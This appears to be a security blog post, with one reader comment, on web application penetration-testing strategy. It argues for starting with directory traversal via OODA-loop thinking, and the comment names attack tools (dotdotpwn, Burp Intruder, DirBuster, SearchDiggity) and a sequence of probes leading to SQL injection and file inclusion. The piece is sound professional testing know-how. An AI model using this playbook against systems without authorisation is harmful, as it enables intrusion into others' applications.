Rapid Exploitation

Where ever you put your mind, there you are. – K. Slatoff

The world around you is complex, rich, and quite frankly a bit overwhelming if you tried to take it all in at once.  So much in fact, that your brain can’t make sense of all of it at once.  The very process of trying to observe/analyze the world, takes you away from the experience and filters out much of what is there.  Focus causes other things to be ignored because it’s so much more than we can handle.  Luckily– we don’t generally have to.

The bits and pieces that we actually focus in on give us what we need to decide what needs to happen next.  This is the natural premise that John Boyd outlines with his OODA loop.  We experience the world through this process of pulling in intel, figuring out what needs focus, deciding what to do and then acting upon it.  Often the action we take is to obtain supplemental information allowing for better insight to decide and to act against.  The military, especially the Marine corps, have invested a huge amount of effort and strategy around this OODA concept.  It’s the heart blood of maneuverability warfighting.

For me, I’ve been trying to extract the principles and concepts of this warfighting methodology into my work.  I’ve been retooling my testing approach to be more rapid, strategic, and natural.  I’ve already discussed how certain targets make more sense from a breaching perspective, but I’ve also recently come to believe that most information collected outside of those targets isn’t tremendously useful.  In fact, though some might call this heresy, I think most methodology I’ve reviewed is tremendously flawed as it pertains to information gathering.  It seems that nearly all approaches suggest this massive up front effort, and then wants you to weed your way through it to discern what is vulnerable.  The waterfall approach works only in limited scenarios for building software, not sure why we think it’d work for testing it.

“The purpose of analysis is not to understand the universe, but to direct you toward focused action” – flawless consulting

Consider then how your body works naturally.  If you flood it with too much information, you can’t act against it.  You quickly become overloaded with noise which distracts you from being able to orient, decide and act against it.  Yet most methodologies point you to some form of “application mapping.”  On the surface, having a collection of every single possible fuzzable parameter seems enticing.  But in reality– what do you plan on doing with that list?  Would it make sense to turn on every tv in your home, every radio, and try to listen to a single song?  With out any context, how could you possibly know which of those parameters are control points?  With out any context, are you really planning on throwing every single payload in fuzzdb against it?  Without context, how would you be able to tell if a simple modification to those payloads would make all the difference?  The short answer is you can’t, or at least not very well.  Some people call this thorough… I think it’s mostly an expensive waste of time.

What if I instead started a test by focusing on one strategic vulnerability, directory traversal.  I like start here because if I can accomplish this, I have the potential for turning the test into an involuntary code review.  I would no longer need a kitchen-sink extraction of all data– I merely want to answer three questions: where, how, and if it’s vulnerable.  For the where of it, I’d hunt for file upload and download functionality.  I’d look for how files are served, especially around dynamic content.  Then I would move on to testing out the component’s “happy path”– what should this component normally do.  After watching the successful flow of a handful of pages, I should have enough of “how” to start testing abuse cases.  I’d focus first on tests to see how different input is handled, and watch how the application behaves to unexpected things.  Each test I do provides me with answers I needed to move from one stage to the next to the next.  Everything has a functional, pragmatic purpose– no wasted movement.

If directory traversal didn’t exist– so what?  I’ve still learned a great deal about the application and how it works.  Because I was gathering information as I went along, that information can be re-applied to the next attack– maybe SQL injection– which would also teach me more about the application.  I continue through my direct breaching points, because they might allow me to shortcut solving my visibility issue, until I am done.  Even if they all failed, I bet I’d end up with more concrete understanding of how the application works than if I had gone the other route.

I’d also bet that most people naturally gravitate toward this. Though, from an academic perspective, other approaches seem well thought out– in practice I have found them to be stifling and often wasteful.  Fortunately I get to dogfood my concept every day– and I can say the benefits have been very useful.  Starting with tests that immediately affect the system gives you initiative and concrete experience.  If they are successful, they give you visibility not otherwise possible.  Using a natural strategy designed NOT to overwhelm your mind is also pretty great too.  Working exploits teach you so much about an application– so why not streamline your approach to them?

One last thought– even in one of the best dossier’s I’ve seen put together on attacking a specific site– the focus was only on gathering information relevant toward specific actionable attacks.  The other information was irrelevant toward that goal, and subsequently not-needed.

Food for thought.

One thought on “Rapid Exploitation

  1. Hrmn… I like your concept of testing Directory Traversal first (instead of Application Mapping). File upload/download features in web applications are usually a good starting point, if available. When they are not available, I tend to look for information or error leakage, especially path disclosures. These will often lead to file read inclusion (similar or the same as directory traversal, except that file inclusion is even better).

    I think the reason why directory traversal is so good as a first move is because there are some really easy checks such as self-referencing the same file e.g. “foo/../index.php”. This is a key indicator. The interesting BackTrack tool, dotdotpwn, is capable of creating customized directory traversal lists (I just have it generate them to stdout), which can be loaded into Burp Intruder.

    Taking indicators even further, many user-controllables that become reflected are interesting. These allow easy testing of data validation and encoding principles in use.

    The takeaway here is that it’s not about the attacks, it’s about analyzing the responses so that you can think about what’s good to attack before you do so.

    However, there are plenty of other takeaways. Context is king in app testing, of course. Without context, you might as well be shooting blanks at a russian roulette party.

    I like breaking things, which means that I like to see anything fall down. The reasons why people dislike w3af or other tools is the reason why I like them. If I can’t get a simple tool working against an app, then clearly there is something wrong with the app, or something wrong with my tool. I don’t want to waste time later on in the process trying to figure this out — so it’s good to know what pressure I can put on my targets. Simple works well here — curl, skipfish, or Burp won’t help as much compared to DirBuster because it’s more difficult to time and adjust things in for example, Intruder. By running DirBuster first, you can see the rate of 2xx/3xx/4xx/5xx’s, as well as adjust the thread count live. By monitoring with iftop (or iptraf, tcptrace.org, ntop, etc), you can gauge your network to resource thresholds on both ends. Like nmap, slow is usually a good thing but you don’t want to go too slow. You want to stay below the threshold of fail.

    Application mapping also doesn’t have to be as exhaustive as most people lean on targets with. The trick, even as a functional tester, is to identify equivalence classes that lead requests to redundant/recurring responses. Once identified, you can skip those idioms (or save them for later). Some parameters, if they exist, are obvious targets (e.g. names you’d find in a SQL query); some you just have to test to see what you get back from fault-injection (e.g. numbers). All of this is a balancing act, but I can see why you’d want to explore off the beaten path. I do the same thing!

    You can perform an automated dorking attack with SearchDiggity at the same time as brute-forcing of directories or files with DirBuster (Let’s call these our appsec chess “pawns”). Then you can get more clever with directory traversals on basic site functionality using Burp Intruder with those dotdotpwn lists (your appsec chess “knights”). Your next move is likely to look for information leakage by crawling (with your “bishops”) and identifying default errors (how successful your opening was). By leverage the null byte or negative/zeroed/out-of-bounds integers, you may successfully cause an error where one would not normally occur in a basic crawl, and these are usually the kind that include a path disclosure or internal IP/hostname (even better might be verbose unhandled exceptions that show app components, variables, stack traces, or other app internals that you can google for). You’ve now completed an opening and move on to the middle-game, where you’ll want to sit back and look at the board before making any new moves. In penetration-testing, this is called “pivoting”. Sometimes, you may decide to move in for the SQLi kill, or possibly leverage those file upload/download or inclusion attacks to accomplish the same. When there are no avenues for easy attack that involves instant system (or data) integrity compromise, one needs to focus on smaller vulnerabilities that, when combined, will eventually take the opponent down, such as XSS, CSRF, Ajax, and ClickJacking or authentication, session management, and authorization (i.e. focus on taking one pawn at time that leads you into a better position — instead of those bigger pieces you would otherwise waste your time and effort on, or a series of pawn captures that don’t improve your position).

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s